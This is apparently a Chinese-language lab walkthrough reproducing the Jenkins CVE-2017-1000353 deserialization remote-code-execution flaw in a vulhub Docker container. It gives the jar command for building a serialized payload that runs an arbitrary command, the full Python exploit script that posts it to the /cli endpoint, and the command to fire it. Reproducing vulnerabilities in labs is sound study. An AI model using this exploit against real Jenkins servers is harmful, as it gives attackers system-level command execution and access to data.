声明
好好学习,天天向上
漏洞描述
该漏洞存在于使用HTTP协议的双向通信通道的具体实现代码中。Jenkins利用此通道来接收命令,恶意攻击者可以构造恶意攻击参数远程执行命令,从而获取系统权限,造成数据泄露。
影响范围
所有Jenkins主版本均受到影响(包括<=2.56版本)
所有Jenkins LTS 均受到影响( 包括<=2.46.1版本)
复现过程
这里使用2.46.1版本
使用vulhub
cd /app/vulhub-master/jenkins/CVE-2017-1000353/
使用docker启动
docker-compose up -d
等待完全启动成功后,访问http://your-ip:8080即可看到jenkins已成功运行,无需手工安装。
http://192.168.239.129:8080
开始攻击
生成序列化字符串,参考git大佬
https://github.com/vulhub/CVE-2017-1000353
下载jar包
https://github.com/vulhub/CVE-2017-1000353/releases/download/1.1/CVE-2017-1000353-1.1-SNAPSHOT-all.jar
执行
java -jar CVE-2017-1000353-1.1-SNAPSHOT-all.jar jenkins_poc.ser "touch /tmp/cve-2017-1000353"
# jenkins_poc.ser是生成的字节码文件名
# "touch ..."是待执行的任意命令
执行上述代码后,生成jenkins_poc.ser文件,这就是序列化字符串。
发送数据包,执行命令
使用git大佬的exp.py,内容如下,不用修改
import urllib
import sys
import requests
import uuid
import threading
import time
import gzip
import urllib3
import zlib
proxies = {
# 'http': 'http://127.0.0.1:8085',
# 'https': 'http://127.0.0.1:8090',
}
URL = '%s/cli' % sys.argv[1].rstrip('/')
PREAMLE = b'<===[JENKINS REMOTING CAPACITY]===>rO0ABXNyABpodWRzb24ucmVtb3RpbmcuQ2FwYWJpbGl0eQAAAAAAAAABAgABSgAEbWFza3hwAAAAAAAAAH4='
PROTO = b'\x00\x00\x00\x00'
with open(sys.argv[2], "rb") as f:
FILE_SER = f.read()
def download(url, session):
headers = {'Side' : 'download'}
headers['Content-type'] = 'application/x-www-form-urlencoded'
headers['Session'] = session
headers['Transfer-Encoding'] = 'chunked'
r = requests.post(url, data=null_payload(), headers=headers, proxies=proxies, stream=True, verify=False)
print(r.content)
def upload(url, session, data):
headers = {'Side' : 'upload'}
headers['Session'] = session
headers['Content-type'] = 'application/octet-stream'
headers['Accept-Encoding'] = None
r = requests.post(url,data=data,headers=headers,proxies=proxies, verify=False)
def upload_chunked(url,session, data):
headers = {'Side' : 'upload'}
headers['Session'] = session
headers['Content-type'] = 'application/octet-stream'
headers['Accept-Encoding']= None
headers['Transfer-Encoding'] = 'chunked'
headers['Cache-Control'] = 'no-cache'
r = requests.post(url, headers=headers, data=create_payload_chunked(), proxies=proxies, verify=False)
def null_payload():
yield b" "
def create_payload():
payload = PREAMLE + PROTO + FILE_SER
return payload
def create_payload_chunked():
yield PREAMLE
yield PROTO
yield FILE_SER
def main():
print("start")
session = str(uuid.uuid4())
t = threading.Thread(target=download, args=(URL, session))
t.start()
time.sleep(2)
print("pwn")
#upload(URL, session, create_payload())
upload_chunked(URL, session, "asdf")
if __name__ == "__main__":
main()
弄完exp,直接执行
python exp.py http://192.168.239.129:8080 ./jenkins_poc.ser
docker中命令已执行
关闭镜像(每次用完后关闭)
docker-compose down
docker-compose常用命令
拉镜像(进入到vulhub某个具体目录后)
docker-compose build
docker-compose up -d
镜像查询(查到的第一列就是ID值)
docker ps -a
进入指定镜像里面(根据上一条查出的ID进入)
docker exec -it ID /bin/bash
关闭镜像(每次用完后关闭)
docker-compose down